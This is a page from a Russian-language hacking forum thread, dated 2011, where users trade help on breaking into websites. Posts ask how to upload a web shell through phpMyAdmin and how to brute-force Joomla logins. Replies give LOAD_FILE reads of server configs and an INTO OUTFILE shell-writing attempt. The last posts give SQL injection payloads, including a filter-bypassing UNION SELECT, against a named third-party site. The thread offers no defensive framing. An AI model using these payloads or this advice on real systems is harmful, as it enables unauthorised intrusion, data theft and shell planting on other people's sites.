HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1833 из 2422 « Первая < 8331333173317831823 1829 1830 1831 1832 1833 1834 1835 1836 1837 1843188319332333 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.11.2011, 15:39
boortyhuhtyu
Guest
Сообщений: n/a
Провел на форуме:
225312

Репутация: -6
По умолчанию
Цитата:
Сообщение от d1v  
d1v said:
тогда иди на завод. и вообще ты разделом ошибся. не пиши сюда больше.
иди на завод сам еп.
 
Ответить с цитированием

  #2  
Старый 26.11.2011, 20:15
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422

Репутация: 0
По умолчанию
Здравствуйте ещё раз. Интересует следующий вопрос:

Имеется доступ к phpmyadmin.

Права пользователя: ALL PRIVILEGES

Версия phpmyadmin: 3.3.4

Sql-injection на сайте не приводит к раскрытию путей.

Какие есть способы залить шелл?

Спасибо за ответ.
 
Ответить с цитированием

  #3  
Старый 26.11.2011, 20:23
PRosTo_LEva
Новичок
Регистрация: 18.04.2007
Сообщений: 1
Провел на форуме:
2012

Репутация: 0
По умолчанию
Предположение - если временно сменить название базы данных - скрипт при попытке подключится выдаст ошибку с раскрытием путей.
 
Ответить с цитированием

  #4  
Старый 26.11.2011, 21:32
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию
Цитата:
Сообщение от Aniweste  
Aniweste said:
Здравствуйте ещё раз. Интересует следующий вопрос:
Имеется доступ к phpmyadmin.
Права пользователя: ALL PRIVILEGES
Версия phpmyadmin: 3.3.4
Sql-injection на сайте не приводит к раскрытию путей.
Какие есть способы залить шелл?
Спасибо за ответ.
LOAD_FILE('/путь/до/конфиг/апача');

Список можно посмотреть тут: /thread49775.html
 
Ответить с цитированием

  #5  
Старый 26.11.2011, 23:45
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422

Репутация: 0
По умолчанию
Цитата:
Сообщение от Boolean  
Boolean said:
LOAD_FILE('/путь/до/конфиг/апача');
Список можно посмотреть тут: /thread49775.html
Делаю sql-запрос - получаю ответ

Код:
Code:
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOAD_FILE('/etc/apache/conf/httpd.conf')' at line 1

Что именно я делаю не правильно?
 
Ответить с цитированием

  #6  
Старый 27.11.2011, 00:46
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от Aniweste  
Aniweste said:
Делаю sql-запрос - получаю ответ
Код:
Code:
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOAD_FILE('/etc/apache/conf/httpd.conf')' at line 1
Что именно я делаю не правильно?
select LOAD_FILE('/etc/apache/conf/httpd.conf')
 
Ответить с цитированием

  #7  
Старый 27.11.2011, 01:57
nakurukataоm
Guest
Сообщений: n/a
Провел на форуме:
5079

Репутация: 0
По умолчанию
Здравствуйте, у меня есть вопрос по nmap:

Распознаёт ли nmap кириллицу? Хочу использовать функцию брута joomla на форуме, но все ники кириллицей и пароли кириллицей сразу отправляются в невалид. как с этим можно побороться?
 
Ответить с цитированием

  #8  
Старый 27.11.2011, 11:19
lion-art
Guest
Сообщений: n/a
Провел на форуме:
7046

Репутация: 1
По умолчанию
тем кто знает хорошо тему заливки файлов.

Цитата:
Сообщение от lion-art  
lion-art said:
Как всегда начну с фразы: "Уважаемые знатоки!"
Есть сайт:
1)file_priv=y
2)mq=off
3) есть /test.php
3) Доступ 4х администраторов в админку есть, доступ в админку www.site.ru/cms) - так он не пускает но если через www.site.ru/index.php/cms тогда пускает но не выполняются скрипты.
4) прочитан config.ini есть пароль root к базе. Но путь до самой базы не известен.
Теперь самое интересное:
config.ini прочитан так:
index/***/id/*21'+or+1+group+by+concat(mid(load_file(0xздес ьхеш),50,163),floor(rand(0)*2))+having+min(0)+ or+1+--+
запрос на запись делаем так: /image/*****/id/*53+and+(select+'+into+outfile+')+!=1
результат - ошибка но через пару часов при
/image/*****/id/*53 без инъекта появляется следущее:
яШяаJFIFHHяб4ExifII*bj( 1r2Ћi‡¤шЂь 'Ђь 'Adobe Photoshop CS2 Windows2011:07:05 16:16:46†’Ъ яя Ж zLEAD Technologies Inc. V1.01FN(VЦHHяШ аJFIFHHян Adobe_CMяоAdobedЂяЫ„            яАc "яЭ яД?   3!1AQa"qЃ2‘Ў
и т.д...
ВНИМАНИЕ ВОПРОС!
На сколько высока вероятность то что into outfile не получится (доходчиво: шелл не зальется?)
P.S. возможно не правильный запрос но если запрос сделать так
/image/*****/id/*53+and+'select+'+into+outfile+'+!=1'
то ошибка такова:
Invalid query: File ' !=1' already exists
Спасибо за внимание надеюсь на коментарии, может у кого-то похожая ситуация была.
Если что пишите в ПМ все остальное не могу выложить в паблик
 
Ответить с цитированием

  #9  
Старый 27.11.2011, 11:34
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию
http://www.shopoldcoloradocity.com/content.php?id=-97+order+14-- (FALSE)

http://www.shopoldcoloradocity.com/content.php?id=-97 1=1 (Blind working)

http://www.shopoldcoloradocity.com/content.php?id=-97 and substring(@@version,1,1)=4

Unknown column '20and' in 'where clause

Even

http://www.shopoldcoloradocity.com/content.php?id=-97 and substring(@@version,1,1)=5

Any solution?
 
Ответить с цитированием

  #10  
Старый 27.11.2011, 11:45
tabletkO
Guest
Сообщений: n/a
Провел на форуме:
28093

Репутация: 11
По умолчанию
lightangel,

http://www.shopoldcoloradocity.com/content.php?id=-97/**/union/**/select/**/1,version(),3,4,user(),6,7,8,9,10,11,12--

Site filter symbol "+". But you can use /**/
 
Ответить с цитированием
Ответ
Страница 1833 из 2422 « Первая < 8331333173317831823 1829 1830 1831 1832 1833 1834 1835 1836 1837 1843188319332333 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ